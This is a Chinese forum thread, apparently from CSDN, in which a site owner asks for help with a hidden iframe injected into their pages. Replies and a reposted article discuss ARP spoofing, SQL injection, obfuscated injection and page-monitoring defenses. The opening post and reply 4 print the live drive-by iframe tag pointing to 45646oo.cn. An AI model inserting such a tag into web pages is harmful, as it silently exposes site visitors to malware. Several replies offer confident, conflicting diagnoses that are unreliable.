网站被嵌入<iframe src=http://45646oo.cn/sky/ms.htm?vip8 width=50 height=0></iframe>,但代码里也没有这段代码。向大家求救!!!

解决方案 »

  1.   

    数据库里看了没还有可能是网关问题arp之类的
      

  2.   

    http://topic.csdn.net/u/20080529/09/44f8a53b-5ea6-4412-8bb6-730889523c7e.html
      

  3.   

    最快速、有效的iFrame治标解法【转自www.bitsCN.com】当网站成为黑客热爱的攻击的目标,也成为散播恶意程序的跳板,企业蒙受的风险与损失随之扩大,也会让网站使用者受到波及。目前Google开始在搜寻结果中加入提醒字符串,标示受骇的网站,对企业而言,更可能因此流失用户。 
      
        如何在这波烽火中生存,最重要的是必须正视问题的严重性,在网站开发与维运阶段提升安全意识。另外,也可藉由导入自动化工具的方法提升安全性,如果资安预算有限,至少找出企业能负荷的安全防护底线,保障企业网站与用户的安全。   治标:监控网页异动,立即回复 
      
        黑客有许多攻下网站的手法,但以修改网页进行偷渡恶意程序的手法而言,最终必须修改网页才能达到目的,因此监控网页便是IT人员可以应变黑客攻击的方法。       黑客修改网页时,对于档案的大小、网页的最后修改时间都会造成影响,因此IT人员可以自行撰写程序,比对网站最近一次修改档案的大小或日期和在线档案是否一致,一旦有出入,就代表有异常,这时就可以进一步检视档案是否有不明的iframe或JavaScript语法指向外部网站,藉此判定是否已经遭到黑客 攻击。万一遭到攻击的话,则必须先做好证据保存的动作,再将网站复原成未入侵前的状态。   网管论坛bbs_bitsCN_com     市面上有针对网站的监控与复原动作提供自动化解决方案的产品,这类产品通常能做到实时化的监控与通报机制,当网站遭到窜改时,立即复原成原先页 面,就能阻挡在网页中植入程序代码的攻击方式,入侵的记录也会保留住。网页监控与复原产品通常也能保护档案服务器上的档案,如果黑客企图删除或更改文件时,系统便会实时复原。       这类产品的价格通常在数万元到十几万元,以资安的产品而言相对较低,对于规模较小的企业较能负担,但它能做便是保持网页不被窜改更动,乍看之下成功的抵挡目前这波新兴的黑客攻击手法,然而它终究只是治标之道。       虽然黑客不能窜改网页内容,但毕竟已经登堂入室,取得修改网页的权限,这意味着黑客也能将数据带走,或者不使用修改网页程序代码的方式,绕道透过SQL Injection的攻击手法,将数据库中的内容带走。       因此不论企业自行撰写程序或采用自动化产品来监控与复原网页,都必须明白它的限制在于提供消极的解法,只保护住网页,但黑客进攻的漏洞没有找出来修补,攻击仍会发生。 网管联盟bitsCN@com 
      
    解析iFrame攻击手法     对黑客而言,如何让使用者毫无警觉,下载恶意程序到使用者的计算机,才能达到黑客之后的目的,例如窃取账号、密码或植入傀儡程序。     利用HTML语法中的iframe语法,即是一个极常见的手法。iframe设计的目的,是让设计人员能在网页中嵌入页框,而页框中可以加载另一个页面,透过这种方式可以设计出更为弹性的网页功能。但iframe到黑客手中,就有了不一样的玩法。只要在iframe属性将宽与高设定为「0」时,被呼叫的页面一样会执行,但不会显示在网页上。这种宛如替网页穿上隐身衣的作法,就会在使用者浏览被骇网站时,神不知鬼不觉地执行藏在隐身页面中的语法。由于iframe手法太过盛行,而且具有明显的辨识特征,于是就有变种的方式出现,利用JavaScript语法改写呼叫手法,再混进网页原有JavaScript中,增加发掘的难度。     一般而言,浏览器如果设定适当的安全性等级,恶意程序在下载或执行时会出现警告讯息,但如果黑客利用安全漏洞,就有机会在不用任何询问下安装恶意程序。比起自行伪造网站容易被人识破,黑客会挑选流量大或知名网站作为散播的源头,成功率较高。黑客会尝试由各种可能的管道入侵,例如网页应用程序本身的缺陷或 是未更新的漏洞。Google强大的搜寻能力,更是助长黑客能取得更多没有作好设定的网站,透过一些关键词往往能查出系统信息或可能的弱点,而让黑客可以取得修改网页的权限。 
    中国网管论坛bbs.bitsCN.com  
        因此当企业发现网站被植入恶意程序时,已经是黑客攻击手段的最后阶段,它只是表面上最容易发现的迹象,事实上,系统或网站应用程序必然存在漏洞,让黑客得以顺藤摸瓜,进而修改网页。 
    【转自www.bitsCN.com】
      

  4.   

    被挂马了,写一脚本程序,查找整站带有“<iframe src=http://45646oo.cn/sky/ms.htm?vip8 width=50 height=0> </iframe>”的字符,清除它
      

  5.   

    看看是不是被加密了.应该是服务器被arp攻击了.我以前也遇到过
      

  6.   

    数据库没有任何影响,服务器放在上海的电信机房,arp欺骗的可能性很小。重装以后也出现了同样的问题。
      

  7.   

    arp欺骗,是你的网络里有病毒,与你得网站没有关系
      

  8.   

    会不会是下面的情况:
    它把那段恶意代码,分成几段,写在几个变量中,然后把变量值合起来输出,你搜索的时候搜的是整体,也就查不到。或者是经过转换了,或者是利用 WebRequest 动态读取的?或者是把代码写在一个文件中,然后把它改名为图片文件,再去读这个图片文件……
      

  9.   

    Google里搜http://45646oo.cn/sky/ms.htm?vip8貌似也没提示是恶意网站,难道现在这东西免杀???
      

  10.   

    "http://www.xnker.com/","www.shike.org.cn(中国铁路时刻网)"等也有同样的恶意程序!
      

  11.   

    100% ARP,不是你的服务器中毒,是访问这个页面的机器中毒
    建议搜索一下arp相关文章,然后下个360来防护
      

  12.   

    你有代码有漏洞吧,是ASP?哈哈,被挂码了吧,我也被中过....先用DW或者FP全部替换掉先吧